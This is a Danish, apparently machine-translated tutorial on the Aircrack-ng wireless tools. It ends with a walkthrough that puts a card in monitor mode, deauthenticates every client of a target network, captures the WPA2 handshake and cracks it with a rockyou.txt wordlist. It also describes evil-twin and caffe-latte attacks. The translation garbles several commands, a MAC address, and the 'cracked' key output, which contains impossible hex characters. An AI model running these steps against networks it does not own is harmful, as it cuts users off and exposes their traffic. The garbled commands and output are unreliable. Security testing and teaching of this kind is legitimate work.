airrack

Sådan bruges Aircrack-ng

Sådan bruges Aircrack-ng
Det meste af tiden tænker folk aldrig på det netværk, som de er tilsluttet. De tænker aldrig på, hvor sikkert det netværk er, og hvor meget de risikerer deres fortrolige data dagligt. Du kan køre sårbarhedskontrol på dine wifi-netværk ved hjælp af et meget kraftigt værktøj kaldet Aircrack-ng og Wireshark. Wireshark bruges til at overvåge netværksaktivitet. Aircrack-ng ligner mere et aggressivt værktøj, der giver dig mulighed for at hacke og give adgang til trådløse forbindelser. At tænke som en ubuden gæst har altid været den sikreste måde at beskytte dig mod et hack på. Du kan muligvis forstå de nøjagtige handlinger, som en ubuden gæst vil foretage for at få adgang til dit system ved at lære om luftrack. Du kan derefter udføre overholdelseskontrol på dit eget system for at sikre, at det ikke er usikkert.

Aircrack-ng er et komplet sæt software designet til at teste WiFi-netværkssikkerhed. Det er ikke kun et enkelt værktøj, men en samling værktøjer, som hver især udfører et bestemt formål. Der kan arbejdes på forskellige områder af wifi-sikkerhed, som at overvåge Access Point, teste, angribe netværket, knække wifi-netværket og teste det. Aircracks vigtigste mål er at opfange pakkerne og dechifrere hash for at bryde adgangskoderne. Det understøtter næsten alle de nye trådløse grænseflader. Aircrack-ng er en forbedret version af en forældet værktøjssuite Aircrack, refererer ng til Ny generation. Nogle af de fantastiske værktøjer, der arbejder sammen om at tage en større opgave ud.

Airmon-ng:

Airmon-ng er inkluderet i airrack-ng-sættet, der placerer netværksinterfacekortet i skærmtilstand. Netværkskort accepterer normalt kun pakker, der er målrettet mod dem som defineret af NIC's MAC-adresse, men med airmon-ng accepteres også alle trådløse pakker, uanset om de er målrettet mod dem eller ej. Du skal være i stand til at fange disse pakker uden at linke eller godkende med adgangspunktet. Det bruges til at kontrollere status for et adgangspunkt ved at sætte netværksgrænsefladen i skærmtilstand. For det første skal man konfigurere de trådløse kort til at tænde skærmtilstand og derefter dræbe alle baggrundsprocesser, hvis du tror, ​​at en proces forstyrrer den. Efter afslutning af processerne kan skærmtilstand aktiveres på den trådløse grænseflade ved at køre kommandoen nedenfor:

[e-mail-beskyttet]: ~ $ sudo airmon-ng start wlan0 #

Du kan også deaktivere skærmtilstand ved at stoppe airmon-ng når som helst ved hjælp af kommandoen nedenfor:

[e-mail beskyttet]: ~ $ sudo airmon-ng stop wlan0 #

Airodump-ng:

Airodump-ng bruges til at liste alle netværk omkring os og til at se værdifuld information om dem. Den grundlæggende funktionalitet ved airodump-ng er at snuse pakker, så det er i det væsentlige programmeret til at få fat i alle pakkerne omkring os, mens de sættes i skærmtilstand. Vi kører det mod alle forbindelser omkring os og indsamler data som antallet af klienter, der er forbundet til netværket, deres tilsvarende mac-adresser, krypteringsstil og kanalnavne og derefter begynder at målrette mod vores målnetværk.

Ved at skrive airodump-ng-kommandoen og give den navnet på netværksgrænsefladen som parameter, kan vi aktivere dette værktøj. Den viser alle adgangspunkter, mængden af ​​datapakker, anvendte krypterings- og godkendelsesmetoder og navnet på netværket (ESSID). Fra et hackingsperspektiv er mac-adresserne de vigtigste felter.

[e-mail-beskyttet]: ~ $ sudo airodump-ng wlx0mon

Aircrack-ng:

Aircrack bruges til krakning af adgangskoder. Efter at have fanget alle pakkerne ved hjælp af airodump, kan vi knække nøglen ved luftrack. Det knækker disse nøgler ved hjælp af to metoder PTW og FMS. PTW-tilgang udføres i to faser. Først bruges kun ARP-pakkerne, og kun derefter, hvis nøglen ikke er revnet efter søgningen, bruger den alle de andre fangede pakker. Et pluspunkt ved PTW-tilgangen er, at ikke alle pakker bruges til revnedannelse. I den anden tilgang, i.e., FMS, vi bruger både de statistiske modeller og brute force algos til at knække nøglen. En ordbogsmetode kan også bruges.

Aireplay-ng:

Airplay-ng introducerer pakker til et trådløst netværk for at skabe eller fremskynde trafik. Pakker fra to forskellige kilder kan fanges af aireplay-ng. Den første er live-netværket, og den anden er pakkerne fra den allerede eksisterende pcap-fil. Airplay-ng er nyttigt under et deauthentication-angreb, der er målrettet mod et trådløst adgangspunkt og en bruger. Desuden kan du udføre nogle angreb som kaffe latte angreb med airplay-ng, et værktøj, der giver dig mulighed for at få en nøgle fra klientens system.  Du kan opnå dette ved at fange en ARP-pakke og derefter manipulere den og sende den tilbage til systemet. Klienten opretter derefter en pakke, der kan fanges af airodump, og aircrack knækker nøglen fra den modificerede pakke. Nogle andre angrebsmuligheder for airplay-ng inkluderer chopchop, fragment arepreplay osv.

Airbase-ng:

Airbase-ng bruges til at omdanne en ubuden gæstes computer til et kompromitteret forbindelsespunkt, som andre kan linke til. Ved hjælp af Airbase-ng kan du hævde at være et lovligt adgangspunkt og udføre man-i-midten-angreb på computere, der er knyttet til dit netværk. Disse slags angreb kaldes Evil Twin Attacks. Det er umuligt for grundlæggende brugere at skelne mellem et lovligt adgangspunkt og et falsk adgangspunkt. Så den onde tvillingstrussel er blandt de mest truende trådløse trusler, vi står over for i dag.

Airolib-ng:

Airolib fremskynder hackingsprocessen ved at gemme og administrere adgangskodelisterne og adgangspunktet. Databasehåndteringssystemet, der bruges af dette program, er SQLite3, som for det meste er tilgængeligt på alle platforme. Adgangskodekrakning inkluderer beregningen af ​​den parvise hovednøgle, gennem hvilken den private forbigående nøgle (PTK) udvindes. Ved hjælp af PTK kan du bestemme rammemeddelelsens identifikationskode (MIC) for en given pakke og teoretisk finde MIC til at ligne pakken, så hvis PTK havde ret, havde PMK også ret.

For at se adgangskodelisterne og få adgang til netværk, der er gemt i databasen, skal du skrive følgende kommando:

[e-mail-beskyttet]: ~ $ sudo airolib-ng testdatabase -statistikker

Her er testdatabase den db, som du vil have adgang til eller oprette, og -stats er den operation, du vil udføre på den. Du kan udføre flere operationer på databasefelterne, som at give maksimal prioritet til noget SSID eller noget. For at bruge airolib-ng med aircrack-ng, skal du indtaste følgende kommando:

[e-mail-beskyttet]: ~ $ sudo aircrack-ng -r testdatabase wpa2.eapol.kasket

Her bruger vi de allerede beregnede PMK'er, der er gemt i testdatabase til at fremskynde processen med adgangskodebrydning.

Sprængning af WPA / WPA2 ved hjælp af Aircrack-ng:

Lad os se på et lille eksempel på, hvad aircrack-ng kan gøre ved hjælp af et par af dets fantastiske værktøjer.  Vi knækker et WPA / WPA2-netværks foruddelte nøgle ved hjælp af en ordbogsmetode.

Den første ting, vi skal gøre, er at angive netværksgrænseflader, der understøtter skærmtilstand. Dette kan gøres ved hjælp af følgende kommando:

[e-mail-beskyttet]: ~ $ sudo airmon-ng
PHY-interface driverchipsæt
Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Vi kan se en grænseflade; nu skal vi sætte det netværksinterface, vi har fundet (wlx0) i skærmtilstand ved hjælp af følgende kommando:

[e-mail-beskyttet]: ~ $ sudo airmon-ng start wlx0

Det har aktiveret skærmtilstand på den kaldte grænseflade wlx0mon.

Nu skal vi begynde at lytte til udsendelser fra nærliggende routere via vores netværksgrænseflade, vi har sat i skærmtilstand.

[e-mail-beskyttet]: ~ $ sudo airodump-ng wlx0mon
CH 5] [Forløbet: 30 s] [2020-12-02 00:17
 
BSSID PWR Beacons #Data, # / s CH MB ENC CIPHER AUTH ESSID
 
E4: 6F: 13: 04: CE: 31 -45 62 27 0 1 54e WPA2 CCMP PSK CrackIt
C4: E9: 84: 76: 10: BE -63 77 0 0 6 54e. WPA2 CCMP PSK HAckme
C8: 3A: 35: A0: 4E: 01 -63 84 0 0 8 54e WPA2 CCMP PSK Net07
74: DA: 88: FA: 38: 02 -68 28 2 0 11 54e WPA2 CCMP PSK TP-Link_3802
 
BSSID STATION PWR Rate Lost Rammer Probe
 
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -3 0 - 1e 8 5
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -33 1e- 6e 0 3
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -35 0 - 1 0 6
E4: 6F: 13: 04: CE: 31 f.Kr.: 91: B5: F8: 7E: D5 -39 0e- 1 1002 13 

Vores målnetværk er Crackit i dette tilfælde, som i øjeblikket kører på kanal 1.

Her for at knække adgangskoden til målnetværket er vi nødt til at fange et 4-vejs håndtryk, hvilket sker, når en enhed forsøger at oprette forbindelse til et netværk. Vi kan fange det ved hjælp af følgende kommando:

[e-mail-beskyttet]: ~ $ sudo airodump-ng -c 1 --bssid E4: 6F: 13: 04: CE: 31 -w / home wlx0

-c         : Kanal

-bssid: Bssid af målnetværket

-w        : Navnet på det bibliotek, hvor pcap-filen placeres

Nu skal vi vente på, at en enhed opretter forbindelse til netværket, men der er en bedre måde at fange et håndtryk på. Vi kan afautentificere enhederne til AP ved hjælp af et afautentiseringsangreb ved hjælp af følgende kommando:

[e-mail-beskyttet]: ~ $ sudo aireplay-ng -0 -a E4: 6F: 13: 04: CE: 31

-en: Bssid af målnetværket

-0: Deauthentication-angreb

Vi har afbrudt alle enheder, og nu må vi vente på, at en enhed opretter forbindelse til netværket.

CH 1] [Forløbet: 30 s] [2020-12-02 00:02] [WPA håndtryk: E4: 6F: 13: 04: CE: 31
 
BSSID PWR RXQ Beacons #Data, # / s CH MB ENC CIPHER AUTH E
 
E4: 6F: 13: 04: CE: 31 -47 1228807 36 1 54e WPA2 CCMP PSK P
 
BSSID STATION PWR Rate Lost Rammer Probe
 
E4: 6F: 13: 04: CE: 31 f.Kr.: 91: B5: F8: 7E: D5 -35 0 - 1 0 1
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -29 0e- 1e 0 22
E4: 6F: 13: 04: CE: 31 88: 28: B3: 30: 27: 7E -31 0e- 1 0 32
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -35 0e- 6e 263708 CrackIt
E4: 6F: 13: 04: CE: 31 D4: 6A: 6A: 99: ED: E3 -35 0e- 0e 0 86
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -37 0 - 1e 0 1            

Vi fik et hit, og ved at se i øverste højre hjørne lige ved siden af ​​tiden kan vi se et håndtryk er fanget. Se nu i den angivne mappe ( /hjem i vores tilfælde) for en “.pcap”-Fil.

For at knække WPA-nøglen kan vi bruge følgende kommando:

[e-mail-beskyttet]: ~ $ sudo aircrack-ng -a2 -w rockyou.txt -b E4: 6F: 13: 04: CE: 31 håndtryk.kasket
b: Bssid af målnetværket
-a2: WPA2-tilstand
Rockyou.txt: Den anvendte ordbogsfil
Håndtryk.cap: Den fil, der indeholder fanget håndtryk
Aircrack-ng 1.2 beta3
[00:01:49] 10566 nøgler testet (1017.96 k / s)
Nøgle fundet! [ du fik mig ]
Hovednøgle: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B 7B 6D
0C 06 08 ED BC 6B H7 J8 K1 A0 89 6B 7B B F7 6F 50 C
Transient nøgle: 4D C4 5R 6T 76 99 6G 7H 8D EC
H7 J8 K1 A0 89 6B 7B 6D AF 5B 8D 2D A0 89 6B
A5 BD K1 A0 89 6B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A0 89
8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B
MAC: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71

Nøglen til vores målnetværk er blevet brudt med succes.

Konklusion:

Trådløse netværk er overalt, brugt af hver eneste virksomhed, fra arbejdere, der bruger smartphones til industrielle kontrolenheder. Ifølge forskning vil næsten over 50 procent af internettrafikken være over WiFi i 2021.  Trådløse netværk har mange fordele, kommunikation uden for døre, hurtig internetadgang på steder, hvor det næsten er umuligt at lægge ledninger, kan udvide netværket uden at installere kabler til andre brugere og kan nemt forbinde dine mobile enheder til dit hjemmekontor, mens du ikke er ikke der.

På trods af disse fordele er der et stort spørgsmålstegn ved dit privatliv og din sikkerhed. Som disse netværk; inden for transmitteringsområdet for routere er åbne for alle, de kan let angribes, og dine data kan let blive kompromitteret. For eksempel, hvis du har forbindelse til noget offentligt wifi, kan enhver, der er forbundet til det netværk, nemt kontrollere din netværkstrafik ved hjælp af noget intelligens og ved hjælp af fantastiske tilgængelige værktøjer og endda dumpe det.

Top 10 spil at spille på Ubuntu
Windows-platform har været en af ​​de dominerende platforme til spil på grund af den enorme procentdel af spil, der udvikler sig i dag til indbygget a...
5 bedste arkadespil til Linux
I dag er computere seriøse maskiner, der bruges til spil. Hvis du ikke kan få den nye høje score, ved du hvad jeg mener. I dette indlæg vil du kende n...
Kamp om Wesnoth 1.13.6 Udvikling frigivet
Kamp om Wesnoth 1.13.6 udgivet i sidste måned, er den sjette udviklingsudgivelse i 1.13.x-serien, og den leverer en række forbedringer, især til bruge...